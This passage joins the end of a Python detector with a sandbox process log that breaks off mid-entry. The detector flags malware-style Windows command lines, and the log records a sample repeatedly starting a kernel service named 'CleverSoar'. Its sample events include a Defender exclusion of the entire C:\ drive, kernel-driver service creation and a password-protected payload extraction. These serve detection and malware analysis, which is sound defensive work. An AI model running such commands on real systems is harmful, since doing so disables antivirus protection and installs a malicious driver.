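    {"image": PS, "cmdline": "\"powershell.exe\" -Command \"Add-MpPreference -ExclusionPath 'C:\\'\""},
    {"image": SC, "cmdline": 'sc create CleverSoar displayname= CleverSoar binPath= '
                             '"C:\\Program Files (x86)\\Windows NT\\tProtect.dll" type= kernel start= auto'},
    {"image": r"C:\Program Files (x86)\Windows NT\7zr.exe", "cmdline": "7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald"},
    {"image": SC, "cmdline": "sc start CleverSoar"},
    {"image": PS, "cmdline": "powershell.exe -NoP -enc " + encode_powershell_command("Add-MpPreference -ExclusionPath 'C:\\'")},
    {"image": SC, "cmdline": 'sc create MyDrv binPath= "C:\\Windows\\System32\\drivers\\mydrv.sys" type= kernel start= demand'},
    {"image": r"C:\Program Files\7-Zip\7z.exe", "cmdline": "7z.exe x -y backup.7z"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:32} {f.image}  {f.detail}")
```

                                           Feed it the Image and CommandLine fields of Sysmon Event ID 1 or Security 4688 with command-line auditing enabled. The sc.exe check only sees services created through that tool; a sample that calls CreateServiceW directly or writes the Services registry key itself leaves no sc.exe command line, so pair it with System log 7045 (service installed) or Security 4697, which record the ImagePath and ServiceType regardless of how the service was registered. The drive-root severity is a heuristic on the path literal and will classify a quoted path with further components as an ordinary path exclusion, which is still worth alerting on.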

                                          Target ID:13
                                          Start time:03:15:42
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:14
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:15
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:16
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:17
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:18
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:19
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                          Imagebase:0x7ff6ef0c0000
                                          File size:496'640 bytes
                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:20
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:21
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:22
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:23
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:24
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:25
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:26
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:27
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:28
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:29
                                          Start time:03:15:43
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:30
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:31
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:32
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:33
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:34
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:35
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:36
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:37
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:38
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:39
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:40
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:41
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:42
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:43
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:44
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:45
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:46
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:47
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:48
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:49
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:50
                                          Start time:03:15:44
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:51
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:52
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:53
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:54
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:55
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:56
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:57
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:58
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:59
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:60
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:61
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:62
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:63
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:64
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:65
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:66
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:67
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:68
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:69
                                          Start time:03:15:45
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:70
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:71
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:72
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:73
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc start CleverSoar
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:74
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:75
                                          Start time:03:15:46
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc start CleverSoar
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
